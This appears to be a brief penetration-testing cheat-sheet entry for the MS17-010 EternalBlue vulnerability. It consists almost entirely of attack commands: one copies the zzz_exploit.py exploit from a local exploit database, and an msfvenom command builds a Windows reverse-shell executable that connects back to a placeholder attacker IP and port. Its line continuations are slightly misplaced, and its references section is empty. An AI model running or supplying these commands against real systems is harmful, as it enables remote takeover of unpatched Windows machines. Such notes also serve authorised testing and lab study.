MS17-010

EternalBlue (zzz_exploit.py)

cp /usr/share/exploitdb/exploits/windows/remote/42315.py .

Shellcode

msfvenom -p windows/shell_reverse_tcp -f exe \
    -o reverse.exe
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT

References

Last updated